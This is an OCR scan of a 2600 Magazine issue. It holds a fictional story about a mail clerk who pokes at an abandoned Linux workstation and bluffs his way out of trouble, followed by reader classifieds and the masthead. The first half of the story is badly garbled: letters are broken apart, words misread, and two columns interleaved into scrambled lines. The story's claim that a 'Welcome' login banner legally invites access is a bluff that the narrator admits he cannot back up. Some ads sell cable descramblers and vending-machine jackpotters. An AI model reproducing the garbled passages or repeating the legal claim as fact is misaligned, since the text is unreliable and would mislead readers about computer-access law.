I t happened wh i l e I was cl er ki ng for one of around for some tag or l abel to tel l me what
the bi g haul age fi rms. The j ob i nvol ved traci ng mach i ne i t was and, more t o the poi nt, what
del i very trucks, photocopyi ng documents, and i t was doi ng al one i n a deserted room, but t he
del i veri ng mai l , even though t hi s was twenty mach i ne was as bare as the room i t was i n .
years after t h e experts announced t h e arri val A network cabl e came out of t h e back and
of the paperl ess offi ce. I t was hass l e from n i ne went i nto a socket on the wal l , so I fi gured
to five. From the fi rst day, I wanted to qu i t, but that the computer was sti l l i n use as part of
havi ng l eft school two years ear l i er at s i xteen, someone' s not-qui te-dead proj ect, or that i t
I di dn' t exactl y have many career choi ces. I had s i mpl y been forgotten about. The noi sy
was studyi ng at n i ght school to become a hard di s k whi rred, di ed, and then whi rred
computer networ k engi neer, but I was t hree igi i n, iS if t he mich i ne WiS doi ng some work
exams away from bei ng qUil i fi ed. i n the background, or had become stuck i n
The onl y good th i ng about the j ob was the i nfi n i te- l oop that 1 960s sci ence fi cti on
that I was free to wander around the enti re foretol d. I l ooked at the screen fi l l ed wi th
bui l di ng wi th the mai l cart. Wi th i n a few days error messages. Whatever program had been
of starti ng, I had found a deserted part of the run n i ng, i t had wel l and tru l y fal l en over, s i nce
bui l di ng, the east wi ng of the s i xth fl oor, where the command- l i ne was ava i l abl e, l eavi ng the
I cou l d go and s l ack off, and l ook down at a l l mach i ne tota l l y open.
the rat racers run n i ng t o and from t hei r i nter- The cursor bl i n ked at me, as i f t o say,
esti ng, hi gh-payi ng j obs. Even better, I cou l d " Pl eise hel p me, for I am broken. "
get some coursework done. I ' ve al ways l i ked computers, and they' ve
On the Fri day of my fi rst week, I hi d a pi l e al ways l i ked me, s o I was happy t o reboot t hi s
of study notes under a stack of mai l and rol l ed mach i ne to a l l ow i t to conti nue the l abors the
the mai l cart up to the s i xth fl oor. I wal ked past anci ents had set for i t. But fi rst I thought I ' d
the si gn showi ng what the spi ffy conference have a l i ttl e l ook, you know, j ust to see what
su i te they were bui l di ng up there woul d l ook operat i ng system i t was run n i ng.
l i ke when i t was fi n i shed, and I went i nto one Bendi ng l ow to type on the keyboard, I
of the empty offi ces. I opened my notes, and opened a few fi l es and soon found out the
started readi ng about I P versi on si x. I hadn' t mach i ne was run n i ng an ol d versi on of Li nux.
been studyi ng l ong when I noti ced a persi stent I was j ust consi der i ng whether I shou l d open
tappi ng sound. I l ooked around, but there was the password fi l e, to add my own user account,
noth i ng i n the room, whi ch was bare. There when I heard the voi ce of doom beh i nd me.
wasn ' t even any carpet. I went out i nto the "What are you doi ng?" i t demanded.
corri dor and peered i nto the offi ce next door. I typed the exi t command and hi t enter.
On the concrete fl oor, al most h i dden from After the screen had cl eared, I turned to see
vi ew, was an anci ent computer workstat i on, some guy i n hi s forti es, wear i ng overa l l s .
whi ch l ooked l i ke i t had been bui l t not l ong " Noth i ng, " I sai d, weakl y. I went t o l eave,
after the di nosaurs had di ed out. I cou l d see but he was a hefty guy, and he bl ocked the
that error messages had fi l l ed the screen. doorway. "Wai t there, " he sai d. He pul l ed out
Pa
g
e 58
2600 Ma
g
azine
a mobi l e phone and di al ed. " No, defi n i tel y not . I was j ust l ooki ng. "
"Hel l o? " he growl ed i nto the handset. To "Yes, but I don ' t get why wou l d you be
cut a l ong story short, the room soon fi l l ed i nterested i n it, anyway. What bus i ness is it of
wi t h peopl e, most of them wear i ng su i ts that your s? "
wou l d have taken a quarter of my year l y sal ary I shr ugged. " I wondered what had gone
to buy. The onl y one to i ntroduce h i msel f was wrong wi t h i t. The screen was ful l of errors. " I
Barker. He was, he sa i d, the IT manager. stopped tal ki ng, hopi ng that it was expl anati on
"Who are you, and what were you doi ng enough. When that di dn' t get any response
wi th that computer?" he sai d. from Bar ker, I conti nued.
" I ' m Karl Ri pl ey. I noti ced t he mach i ne had " I ' m tak i ng a n i ght-school course i n
crashed, " I repl i ed, avoi di ng any reference to computers, and there' s a troubl eshooti ng
my bei ng a mai l cl erk on my fi rst week. modul e. I t hought t hat I mi ght recogni ze t he
"Tamper i ng wi t h computers i s an offense. " errors. "
"Cri mi nal offense, " added t he admi n, j ust Barker l ooked around at t he s ui ts, to see
i n t i me for the arri vi ng securi ty guard to hear i t. how they took my expl anati on. Then he l ooked
There was a l u l l i n the cross- questi oni ng wh i l e me over, a n d I real i zed that he j ust wanted to
everybody seemed to be wai t i ng for me to get r i d of me. L i ke most IT managers, he prob
say someth i ng. A coupl e of Mi crosoft mi nutes abl y had twel ve hours of work to fi t i nto an
went by, but I cou l dn' t fi nd anyth i ng t o say. ei ght-hour workday.
My brai n was s l owl y fi l l i ng wi th i mages of me " Look, " he sai d, " I ' m goi ng to gi ve you the
push i ng a mai l cart around the Cedar Creek benefi t of t he doubt t hi s ti me, because i t' s you r
Federal Correct i onal Faci l i ty. I wondered what fi rst week here, and you obvi ousl y don ' t know
ki nd of j a i l t i me does hacki ng carri ed. the l ocal ru l es. B ut from now on, thi s sect i on
" I was n' t tamperi ng, j ust l ooki ng. I know I i s off- l i mi ts. And if you see any probl ems wi t h
shou l d have phoned t he hel pdesk, but i t ' s my any other computers, then do us a l l a favor and
fi rst week here, and I forgot the number. " Actu- j ust ri ng t he hel pdesk. Don ' t stand l ooki ng at
a l l y, I had never known i t. The onl y comput i ng the screen, because around here . . . "
that genera l cl erks were a l l owed to do was I fel t t he tensi on i n my body van i sh, and I
computi ng the square root of noth i ng. was j ust about to start breath i ng aga i n when
"Th i s ki d cou l d have been hacki ng, " the guy i n overal l s, t he one who had found
t he admi n sai d. " I t h i n k we shou l d cal l t he me, i nterrupted Barker.
pol i ce. " My stomach di d a somersau l t. Obvi - " I tol d you, he was n' t j ust l ooki ng at the
ousl y, th i s crufty- I ooki ng workstati on hel d screen, " he sai d. "He was typi ng on t he keys. "
some sort of commerci al data, l i ke the payrol l I ' d forgotten he was there. The whol e room
deta i l s for the l ast ten years or the fi l e on t umed to l ook at h i m, and Barker gl ared at
who won Offi ce Cl erk of the Month . I l ooked h i m, as i f he was annoyed at h i m for maki ng
around at t he crowd. Nobody obj ected t o t he a bi g deal out of noth i ng. The j an i tor gl ared
admi n ' s suggest i on. I saw the secu ri ty guard back. Maybe, I thought, he al so used t he s i xth
move s l i ght l y to hi s l eft, bl ocki ng t he exi t a fl oor for sl acki ng off or brewi ng moonsh i ne or
l i ttl e more, and I fel t t he fi rst drop of sweat someth i ng, and I had i ntruded on h i s t urf.
run down my forehead. Onl y Barker l ooked "I saw h i m, " he added defensi vel y. Barker
unconcerned. turned back to me. Hi s eyebrows rose as he
"Let ' s not overreact," he sai d. "Some- wai ted for an answer. There was no sense
body wal ks i nto an open offi ce and l ooks at a denyi ng i t.
computer, i t' s hardl y a fel ony." "I onl y cl eared the screen, " I sai d. "I was
"Th i s area is cl osed off," the admi n sa i d goi ng t o cal l i t i n t o the hel pdesk when I
defensi vel y. " Nobody is a l l owed up here. " got back downstai rs. " That was l ame, and I
Barker turned back to me, and sai d, "What cri nged whi l e sayi ng i t. Barker l ooked more
are you doi ng i n t hi s sect i on, anyway? " di sappoi nted t han annoyed.
" I push my cart t hrough here, " I sai d, a "Can you check what he typed on that
bi t breat hl ess l y. "I t ' s shorter t han goi ng back mach i ne? " he asked the admi n .
t hrough t h e other sect i on twi ce. " " Poss i bl y, " was the admi n ' s repl y. He
I t a l l sou nded i nnocent enough, whi ch i n a sounded uns ure. That was a good s i gn. I n
way i t was. Barker l et out a weary breat h. my experi ence, i t ' s rare to fi nd an admi n i s-
" I don ' t have t i me for t hi s, " he sai d to trator who is as good wi th Li nux as he is wi t h
no one i n parti cul ar. He l ooked at me, and Mi crosoft Wi ndows. I t ' s l i ke fi ndi ng someone
t hen l ooked at the machi ne, then back at me who can wr i te wi t h thei r l eft and r i ght hands
aga i n . equal l y wel l . Most peopl e I knew used ei ther
"You di dn' t do anyth i ng wi t h that Wi ndows or Li nux. I was hopi ng t he admi n
mach i ne? " standi ng at t he workstat i on fel l i nto t he
Summer 2008
Pa
g
e 59
Wi ndows category. per haps wonderi ng if what I had sai d made
" I ' l l check the hi story l og, " he sa i d. My sense. I was n' t s ure mysel f. My L i nux ski l l s
hope of hi m not knowi ng L i nux vani s hed, were not exact l y bri l l i a nt, but I was hopi ng
and my heart sank. The hi story l og on Li nux that they were better t he admi n-from- hel l ' s.
i s the fi l e t hat keeps track of every command "Who are you ? " Barker sai d sudden l y. Then
typed, and I knew that i t wou l d have a l i st of he rephrased i t. "I mean, you don ' t work i n my
my recent act i vi ty. As I say, I am not much department. What i s i t you do here? "
of a hacker, and hadn' t bothered t o del ete " I work i n t he mai l room, " I croaked,
a nyth i ng to cover my tracks. I hadn ' t expected whi ch had an even better effect on the su i ts
there was goi ng to be an i nvesti gat i on. Thank t han t he hi story-fi l e remar k. Barker l ooked
god I hadn' t created a user account . " Hacker arou nd, cl ear l y puzzl ed. The admi n l ooked at
creates backdoor to stea l commerci al secrets, " me, and I knew he knew he cou l dn' t back up
t he headl i nes wou l d have sa i d. h i s accusati on. I a l so knew that I ' d made an
The admi n l ogged on t o t he mach i ne, and I enemy forever. Offi ce enemi es, though, I can
watched hi m open the hi story fi l e for the root l i ve wi t h.
user. " You can' t l et h i m go, " the admi n sai d.
"He' s been l ooki ng i n t he process di rec- " Those commands must have come from
tory," he sa i d. He l ooked up wi th an outraged hi m. "
expressi on l i ke a TV l awyer, onl y l ess s i ncere. "You don ' t have any evi dence, " sai d
"What does t hat mea n? " snapped Bar ker. Barker.
"He was probabl y tryi ng to fi nd out what " He was seen typi ng by a wi tness. It is a
servi ces are ava i l abl e. " cr i mi nal offense t o access a computer t hat you
Ba rker tu rned back to me, assumi ng the are not aut hor i zed to use. I f you don ' t ca l l the
fu l l aut hor i ty of h i s offi ci al rol e. pol i ce, I wi l L" He uncl i pped a mobi l e phone
" Di d you type those commands ? " he fr om hi s bel t. He was goi ng to use i t. I had
demanded, j abbi ng hi s fi nger at the screen. another vi si on, one of my career bei ng over.
Unt i l t hen, I had wa nted to be honest, and Not onl y that, but these peopl e were from
i f i t had been j ust Barker on h i s own, I ' d have one of the bi ggest compani es i n the country.
tol d h i m what I had done. Even though what They di dn' t dea l i n di mes; they were used to
I ' d done was n' t i tsel f a cr i me, I knew that worki ng wi th mi l l i ons of dol l ars dai l y. When
someone somewhere cou l d probabl y make asked to assess the damages to thei r suppos
a three-act courtroom drama out of i t. They' d edl y- hacked network, they' d have no troubl e
l awyer u p and hang me out t o dry, I knew i t. cooki ng up some seven-fi gure sum to put i n
S o I l i ed. front of a j udge. I got a hol l ow feel i ng i n my
"Wh i ch commands? " I s ai d i n nocentl y. The stomach. I knew that even i f I di dn ' t get j a i l ed,
admi n hel pfu l l y stepped away from bei ng i n I ' d have a hacki ng rap on my record, a n d then
front of the screen, and I made a pretense of nobody was ever goi ng to h i re me to work
l ooki ng at the evi dence. There on the screen i n computers ever aga i n . I was goi ng to be a
were the commands I had used to i nspect the fi fty-year-ol d genera l cl erk, sti l l l i vi ng wi th my
machi ne. But I soon rea l i zed that i n hi s eager- parents, hopi ng to have a heart attack j ust so I
ness to prove hi s poi nt, the admi n had made a di dn' t have to push that cart around an offi ce
mi stake. Not onl y was he not a L i nux guru, he I hated.
was n' t much of a n admi n, ei ther. We stood i n s i l ence for a moment, the
" No, " I sai d, fi rml y. "That j ust tel l s you what admi n poi sed to di a l . I cou l d see the secu
the l ast commands were. I t does n' t tel l you r i ty guard tens i ng hi s hands, gett i ng ready for
who typed them, or when they were typed. I t acti on. I n the s i l ence, I heard the machi ne' s
cou l d have been anybody. And i t cou l d have noi sy hard di s k spi n up agai n, and start whi r-
been weeks ago. " r i ng, and I l ooked at the screen. And then I
I thought I saw a h i nt of a s mi l e appear had my second brai n wave of the mor ni ng.
on Bar ker ' s face, whi ch was qu i ckl y repl aced "I t' s not a cri mi na l offense, " I sai d. " Not on
wi t h hi s offi ci al express i on. I had i mpressed that computer. "
the s ui ts, too. A few rai sed expectant eyebrows I wai ted for Barker to say someth i ng, but
toward the admi n . Ther e i s a s urpri s i ng l ack nobody sai d a word. I poi nted at the screen,
of bi as i n management sti ffs. Sure, they obvi - where the admi n had j ust l ogged i n .
ous l y enj oy a good feedi ng frenzy, bu t you ' d "Your system says 'wel come' whenever
thi n k they' d automati cal l y cheer for the guy anybody l ogs i n . "
i n the most expensi ve sui t, and t hat ' s not true. Every head i n the room turned to l ook at
I nstead, i t ' s a case of l i ne ' em up and may the the screen. There at the top was the message
best man wi n. of t he day, t he text that accompani es every
Barker stood there s i l ent l y, l ooki ng at me, l ogon . Ri ght next to the name of the company
Pa
g
e 60
2600 Ma
g
azine
was the word "Wel come. "
"A wel come can be l ega l l y construed as an
i nvi t at i on. Pl us there was no warn i ng t hat t hi s
i s a restri cted system. "
I watched my audience, their business brains digesting the information.
"And, since the program had crashed, and I hadn't actually logged in," I added, "then legally speaking I haven't done anything wrong." Barker turned to the admin.
"Is that true?" he asked. The admin stood there, holding his phone, and tensing his jaw. He didn't reply. Actually, I had no idea if it was true, either. Barker let out a long breath through his nose, then spoke again.
"How many other machines have we got like that?" He wasn't holding back now. He was seriously annoyed, and he was letting the admin have it. Luckily for me, there was some administrative turf-war going on between the two. Office politics: don't you just love it?
"I don't know," said the admin, reluctantly. "You'll have to ask Bill. It's his box." I gathered that Bill was the company's UNIX wizard. "But this kid shouldn't be touching it."
"It shouldn't be on the floor in an empty office. What's it doing in here anyway?" snapped Barker. The admin was going to say something, but Barker preempted him.
"You'd better get Bill up here today. I don't care what he's doing; tell him to get up here now. We need the standard warning message on every Linux machine, today."
"But there are dozens of them," said the admin, a bit whiney.
"It's simple. Just change the message of the day," I suggested helpfully.
Barker shot me a look, and I shut my mouth, and looked suitably serious. Contrite, I think is the word.
"Just get it done," he said to the admin. "And get this machine out of here and into the server room."
The admin was outranked, and he knew it. He nodded silently. At the back of every office drone's mind is the mortgage he has to pay. More likely, the admin was simply following the route to the top that the ads secretly suggest: obey silently, and one day you can be the winner of the rat race. Barker turned to me.
"Go back to your work, and if you touch another machine in here, I'll personally call the police."
"I won't," I said. "Thanks."
I headed to the door. The guard stepped aside to let me pass, and I left him and the Inquisition to their post-event discussion and went out. I grabbed the cart and hustled along the corridor as fast as my wheels would go. I hit the button to fetch the elevator, and I could hear the suits filing out of the room, their spectator sport over with, going back to writing memorandums to the board. The door opened and I got in. As the elevator descended, I said a silent prayer to whomever the patron saint of hackers is, and quietly resolved that my firstborn male child would be named Barker.
I exited on the ground floor, almost colliding with one of the junior clerks who was always bugging me about putting her mail on the desk instead of in the proper tray.
"Oops," I said, with a friendly smile. She was cute, and I guess the recent excitement had caught me off guard, the adrenalin had given me confidence, or something, and so I said, "How's it going?" or words to that effect. She walked away without saying anything, the perfect end to a perfect day.
I went down the corridor and into the mail room, and I stayed there until five o'clock. It's funny how a close brush with imprisonment can make mail sorting seem like fun.
I never found out what was on that workstation or why it was in that empty room, and I never asked. But I did get a call on the following Monday. It was Barker. He wanted to know if I would like to work for him in the IT department. He said that he needed people with Linux skills. Of course, I accepted, and a few months of study and three exams later, I was given the official title of network engineer. Basically, I get paid to play with networks, to see where the security holes are, and occasionally to swap out a broken switch.
These days, I can afford to buy computer equipment from this century. I never went back to a life of criminal hacking, and I've never had to push a cart around an office ever again - so far. But I did manage to bump into that clerk, the one I collided with on my first week. This time, I got a smile, and as I watched her walk away, I noticed a bit of a sway in her hips that hadn't been there before.
I'd tell you about how the computer on her desk developed a network fault that only I could fix, but you can probably guess the details.
Have an interesting fictional story concerning hacking that you'd like to test out on our readers? Send it on in to articles@2600.com. Please tell us it's fiction so we don't inadvertently spread a pack of lies.
Happenings
PHREAKNIC 12. Nashville 2600 is once again proud to present PhreakNIC 12, held every year in Nashville, TN. We are holding this technology conference in the same location as the past ' years, the Days Inn at the Stadium on October 24th-26th, 2008. Visit http://phreaknic.info for the latest information, including hotel booking information and pre-registration. Call (615) 254-1551 and mention "PhreakNIC" for the special rate of $67/night.
For Sale
SECURITY SYSTEM FOR SALE, under $100 and no monthly fees. I am selling security systems to protect your computer or personal space such as a dormitory or apartment, etc. This covert alarm system calls your cell phone on detection of intrusion, then allowing you to use your cell phone to hear the intruder's activities through a sound amplified microphone on the unit. This alarm system is disguised as an ordinary house phone and is also a working phone! (Great for offices.) Best security system money can get for under $100 and no monthly fees. Order now for $75 only at www.CNC-Distribution.com/CNC
MAC SPYWARE - anti-spyware for the Mac OS X, detects, isolates, and removes spyware and over 8000 tracking cookies. Thirty day free trial - http://macscan.securemac.com/ - Help us promote MacScan, receive a free copy, and swag - macsec@securemac.com for details.
CRACKER FRIENDLY GLASS TOBACCO PIPES, water pipes, chamber pipes, and accessories. Liquidation sale! For those pulling all-nighters who need help focusing. Free shipping for orders over $30. Email kurlie1984S@yahoo.com for pics and questions. Must be 18!
CABLE TV DESCRAMBLERS. New. Each $45 + $5 shipping, money order/cash only. Works on analog or analog/digital cable systems. Premium channels and possibly PPV depending on system. Complete with 110vac power supply. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler. Requires a cable TV converter (i.e., Radio Shack) to be used with the unit. Cable connects to the converter, then the descrambler, then the output goes to TV set tuned to channel 3. CD 9621 Olive, Box 28Q92-TS, Olivettet Sur, Missouri 63132. Email: cabledescramblerguy@yahoo.com.
TV-B-GONE. Turn off TVs in public places! Airports, restaurants, bars, anywhere there's a TV. Now available as an open source kit, as well as the super-popular original keychain. The kit turns off TVs at 40 yards! And now, for professionals, the TV-B-Gone Pro turns off TVs up to 100 yards away! 2600 readers get 10% discount on TV-B-Gone keychains - use Coupon Code: 2600. www.TVBGone.com
JEAH.NET supports 2600, because we read too! JEAH.NET continues to be #1 for fast, stable FreeBSD shell accounts with hundreds of vhost domains, FreeBSD and Plesk web hosting, 100% private and secure domain registration, and aggressive merchant solutions. 2600 readers' setup fees are always waived at JEAH.NET.
JINX-HACKER CLOTHING/GEAR. Tired of being naked? JINX.com has 300+ T's, sweatshirts, stickers, and hats for those rare times that you need to leave your house. We've got swag for everyone, from the budding n00blet to the vintage geek. So take a five minute break from surfing pr0n and check out http://www.JINX.com. Uber-Secret-Special-Mega Promo: Use "2600v25no2" and get 10% off of your order.
VENDING MACHINE JACKPOTTERS. Go to www.hackershomepage.com for Vending & Slot Machine Jackpotters, Safe Crackers, Lock Picks, Phone Devices & Controversial Hacking Publications.
NET DETECTIVE. Whether you're just curious, trying to locate or find out about people for personal or business reasons, or you're looking for people you've fallen out of touch with, Net Detective makes it all possible! Net Detective is used worldwide by private investigators and detectives, as well as everyday people who use it to find lost relatives, old high school and army buddies, deadbeat parents, lost loves, people that owe them money, and just plain old snooping around. Visit us today at www.netdetective.org.uk.
NETWORKING AND SECURITY PRODUCTS available at OvationTechnology.com. We're a supplier of Network Security and Internet Privacy products. Our online store features VPN and firewall hardware, wireless hardware, cable and DSL modems/routers, IP access devices, VoIP products, parental control products, and ethernet switches. We pride ourselves on providing the highest level of technical expertise and customer satisfaction. Our commitment to you... No surprises! Buy with confidence! Security and Privacy is our business! Visit us at http://www.OvationTechnology.com/store.htm.
REAL WORLD HACKING: Interested in rooftops, steam tunnels, and the like? Read the all-new Access All Areas, a guidebook to the art of urban exploration, from the author of Infiltration zine. Send $20 postpaid in the US or Canada, or $2. overseas, to PO Box 13, Station E, Toronto, ON M6H 4E1, Canada, or order online at www.infiltration.org.
FREEDOM DOWNTIME DVD! Years in the making but we hope it was worth the wait. A double DVD set that includes the two hour documentary, an in-depth interview with Kevin Mitnick, and nearly three hours of extra scenes, lost footage, and miscellaneous stuff. Plus captioning for 20 (that's right, 20) languages, commentary track, and a lot of things you'll just have to find for yourself! The entire two disc set can be had by sending $., 0 to Freedom Downtime DVD, PO Box 752, Middle Island, NY 11953 USA or by ordering from our online store at http://store.2600.com. (VHS copies of the film still available for $15.)
Help Wanted
LOOKING FOR HELP from anyone in the writing of a proposal to help me try to reinstate personal computers in the East Jersey State Prison in Rahway, New Jersey. We are operating under a new commissioner since the computers were taken away in 1995 due to policy revisions for no reason at all. If anyone knows someone that knows someone that knows the commissioner of the New Jersey State Prisons, we seek your help in this matter. I am also looking for anyone who is willing to help me with my programming skills. Anything will be a plus. Contact info: Akmed R. Fluker, 467096/853803A, Lock Bag R, Rahway, New Jersey 07065. Peace and brotherhood to all.
RENEGADE BLACK SHEEP TECH ENTREPRENEUR in process of putting flesh on the bones of an encrypted voice communications project. Do you have experience in the deep details of VoIP/SIP protocols, network traffic analysis, billing system construction, PtoP routing, and so on? Interested in working with a top-end team to build a world-changing tool for regular folks around the world to use in their everyday lives? Contact me at wrinko@hushmail.com.
Wanted
LOOKING FOR 2600 READERS who would like to offer their services for hire. Want to make money working from home or on the road, call (740) 544-6563 extension 10.
WANTED. Verified/verifiable computer hacker. Will pay $75 for interview to be used for future publication; either on-the-record or off-the-record. Response2600 (at) yahoo.com.
Services
HACKER TOOLS TREASURE BOX! You get over 660 links to key resources, plus our proven methods for rooting out the hard-to-find tools, instantly! Lets you build your own custom hacker (AHEM, network security) toolkit. http://FortressDataProtection.com/securitybook
GET A RAISE AT WORK - BLOCK MORE SPAM. SpamStopsHere (www.spamstopshere.com) is the premier solution to help you improve your boss' opinion of you, or help you keep spam away from your own business. It will help you block over 99% of spam "out of the box" and has virtually no false positives. It requires no tuning, other than having your users send any spam that does manage to get through to a special e-mail address, so it too gets blocked for all of SpamStopsHere's clients. Because of the methodology used, even medical groups and law firms, the two hardest types of organizations to spam filter, can get great success. I've been using the service myself for two years at my employer, and have personally had two false positives in that time, with h' of the mail my organization receives being spam. In the event that there is a false positive, your users can find out about it themselves and retrieve it themselves. The service is also capable of blocking viruses, putting another line of defense between a virus and your mail servers. The service even improves e-mail reliability with multiple-redundant servers at locations around the U.S., which JuIG-|t|t and forward your e-mail in the event of a hardware failure on your end. Best of all, it is very affordable, and offers a 30-day free trial. Realizing that we'd be a good market for them, I managed to negotiate a 15 percent discount off the price of the service for all 2600 readers. Simply contact Sean at sean@spamstopshere.com and mention .|||AJJ.|nt to get your discount.
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY RELATED CRIME? Have an idea, invention, or business you want to buy, sell, protect, or market? Wish your attorney actually understood you when you speak? The Law Office of Michael B. Green, Esq. is the solution to your 21st century legal problems. Former SysOp and member of many private BBS's since 1981 now available to directly represent you or bridge the communications gap and assist your current legal counsel. Extremely detailed knowledge regarding criminal and civil liability for computer and technology related actions (18 USC 1028, 1029, 1030, 1031, 1341, 1342, 1343, 2511, 2512, ECPA, DMCA, 1996 Telecom Act, etc.), domain name disputes, intellectual property matters such as copyrights, trademarks, licenses and acquisitions, as well as general business and corporate law. Over 11 years experience as in-house legal counsel to a computer consulting business as well as an over 20 year background in computer, telecommunications, and technology matters. Published law review articles, contributed to nationally published books, and submitted briefs to the United States Supreme Court on Internet and technology related issues. Admitted to the U.S. Supreme Court, 2nd Circuit Court of Appeals, and all New York State courts and familiar with other jurisdictions as well. Many attorneys will take your case without any consideration of our culture and will see you merely as a source of fees or worse, with ill-conceived prejudices. My office understands our culture, is sympathetic to your situation, and will treat you with the respect and understanding you deserve. No fee for the initial and confidential consultation and, if for any reason we cannot help you, we will even try to find someone else who can at no charge. So you have nothing to lose and perhaps everything to gain by contacting us first. Visit us at: http://www.computorney.com or call 516-9WE-HELP (516-993-4357).
HAVE A PROBLEM WITH THE LAW? DOES YOUR LAWYER NOT UNDERSTAND YOU? Have you been charged with a computer related crime? Is someone threatening to sue you for something technology related? Do you just need a lawyer that understands IT and the hacker culture? I've published and presented at HOPE and Defcon on the law facing technology professionals and hackers alike. I'm both a lawyer and an IT professional. Admitted to practice law in Pennsylvania and New Jersey. Free consultation to 2600 readers. http://muentzlaw.com alex@muentzlaw.com (215) 806-4383
PIMP YOUR WIRELESS ROUTER! http://packetprotector.org. Add VPN, IPS, and web AV capabilities to your wireless router with free, open-source firmware from PacketProtector.org
ADVANCED TECHNICAL SOLUTIONS. #422 1755 Robson Street, Vancouver, B.C. Canada V6G 3B7. Ph: (604) 928-0555. Electronic countermeasures - find out who is secretly videotaping you or bugging your car or office. "State of the Art" detection equipment utilized.
INCARCERATED 2600 MEMBER NEEDS COMMUNITY HELP to build content in free classified ad and "local business directory" in 50 countries. John Lambros, the founder of Boycott Brazil, has launched a FREE classified ad, want ad, and local business directory in 50 global markets. The mission is simple: "free help to billions of people locating jobs, housing, goods and services, social activities, a girlfriend or boyfriend, community information, and just about anything else in over one million neighborhoods throughout the world - all for FREE. HELP ME OUT! SPREAD THE WORD! Please visit www.NoPayClassifieds.com and add some content. It will take all of five or ten minutes. Links to "No Pay Classifieds" are also greatly appreciated.
INTELLIGENT HACKERS UNIX SHELL. Reverse.Net is owned and operated by intelligent hackers. We believe every user has the right to online security and privacy. In today's hostile anti-hacker atmosphere, intelligent hackers require the need for a secure place to work, compile, and explore without big-brother looking over their shoulder. Hosted at Chicago Equinix with Juniper Filtered DoS Protection. Multiple FreeBSD servers at P4 2.4 ghz. Affordable pricing from $5/month with a money back guarantee. Lifetime 26% discount for 2600 readers. Coupon code: Save2600. http://www.reverse.net
Announcements
OFF THE HOOK is the weekly one hour hacker radio show presented Wednesday nights at 7:00 pm ET on WBAI 99.5 FM in New York City. You can also tune in over the net at www.2600.com/offthehook or on shortwave in North and South America at 7415 khz. Archives of all shows dating back to 1988 can be found at the 2600 site in mp3 format! Shows from 1988-2006 are now available in DVD-R high fidelity audio for only $10 a year or $150 for a lifetime subscription. Send check or money order to 2600, PO Box 752, Middle Island, NY 11953 USA or order through our online store at http://store.2600.com. Your feedback on the program is always welcome at oth@2600.com.
THE HACKERS YOUTUBE. Video sharing community for uploading and watching streaming hacking, modding, and underground videos that the community can rely on to deliver quality content to anyone willing to take the time to learn. http://www.veryangrytoad.com
THE HIGH WEIRDNESS PROJECT. We are a SubGenius wiki seeking submissions of strange, controversial, subversive, and above all Slackful sources of information. We do not follow a so-called "neutral point of view" - please make your entries as biased as you want, as long as they're interesting! Special sections dedicated to information warfare, software, conspiracies, religion and skepticism, and more. Check us out: www.modemac.com.
PHONE PHUN. http://phonephun.us. Blog devoted to interesting phone numbers. Share your finds!
Personals
COUNTER-INTELLIGENCE, HACKING, computer related countermeasures. Former intelligence officer interested in new computer related technology. In search of friends, contacts, and worldwide penpals any age, race, or orientation. If possible, include photo with letter. No nudity, polaroids, or inmate mail. Spanish or English OK. I purchase magazines, books, unusual pictures with my own funds. WM, 6', 180, blonde, brown - will respond to all. Interested in info on financial privacy, offshore trusts, hacking, and counterintelligence. D. Coryell, T-68127, PO Box 8504, D3-247up, Coalinga, CA 93210.
WHEN THE BULLET HITS THE BONE. Change of address. If you tried to send mail and it got returned, that's why. Bored and lonely phone nerd with some time left in our nation's wonderful corrections system. Still looking for pen pals to help me pass the time. Will respond to all. Interests include but not limited to telecom, computers, politics, music, tats, urban exploration, electronics. I'm a 23 yrs white male, black hair, green eyes. Some tats. Michael Kerr 09496-029, FCI Oxford, PO Box 1000, Oxford, WI 53952.
ZJ YEAR OLD SERVING Z YEARS in Sheridan, Oregon for hacking into AT&T plus many other VoIP providers. First to be charged with VoIP crimes. Featured on America's Most Wanted with K. Mitnick. Looking for ANYONE to write me. Check freerobert.com for more info.
GAY PRISONER SEEKS FRIENDS to help with book review lookups on Amazon by keywords. Com Sci major, thirsty to catch up to the real world before my reentry. I have my own funds to buy books. I only need reviews. I'm MUD/MMORPG savvy in C++, Java, Python, PHP, MySQL, DirectX. Ken Roberts J60962, 450-1-28M, PO Box 9, Avenal, CA 93204.
OFFLINE OUTLAW IN TEXAS needs some help in developing programming skills. Interested in Perl and Javascript. Also privacy in all areas. Library here is inadequate. Feel free to drop those Bill Me Later cards, add me to the mailing lists, etc. Thanks to all those who have helped me so much already, you know who you are. William Lindley 822934, CT Terrell, 1300 FM 655, Rosharon, TX 77583-8604
ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don't even think about trying to take out an ad unless you subscribe! All ads are free and there is no amount of money we will accept for a non-subscriber ad. We hope that's clear. Of course, we reserve the right to pass judgment on your ad and not print it if it's amazingly stupid or has nothing at all to do with the hacker world. We make no guarantee as to the honesty, righteousness, sanity, etc. of the people advertising here. Contact them at your peril. All submissions are for ONE ISSUE ONLY! If you want to run your ad more than once you must resubmit it each time. Don't expect us to run more than one ad for you in a single issue either. Include your address label/envelope or a photocopy so we know you're a subscriber. Send your ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953.
Deadline for Autumn issue: /Z5/0.
The 900 page collection of highlights from our 24 years of publishing is now out, including all sorts of new commentary to go along with the historic material. Published by Wiley and available at bookstores everywhere, obtainable via amazon.com, bn.com, borders.com, and countless other sites throughout the world.
"There's no place like HOPE"
- random Last HOPE attendee, I:
STAFF
Editor-In-Chief: Emmanuel Goldstein
Associate Editor: Mike Castleman
Layout and Design: Skram
Cover: Dabu Ch'wald
Office Manager: Tampruf
Writers: Bernie S., Billsf, Bland Inquisitor, Eric Corley, Dragorn, Paul Estev, Mr. French, Javaman, Joe630, Graverose, Kingpin, Kn1ghtl0rd, Kevin Mitnick, The Prophet, Redbird, David Ruderman, Screamer Chaotix, Silent Switchman, StankDawg, Mr. Upsetter
IT Operations: css, Juintz
IRC Admins: beave, mangala, koz, r0d3nt
Broadcast Coordinators: Juintz, thai
2600 (ISSN 0749-3851, USPS # 003-176); Summer 2008, Volume 25 Issue 2, is published quarterly by 2600 Enterprises Inc., 2 Flowerfield, St. James, NY 11780. Periodical postage rates paid at St. James, NY and additional mailing offices.
POSTMASTER: Send address changes to: 2600, P.O. Box 752, Middle Island, NY 11953-0752.
SUBSCRIPTION CORRESPONDENCE: 2600 Subscription Dept., P.O. Box 752, Middle Island, NY 11953-0752 USA (subs@2600.com)
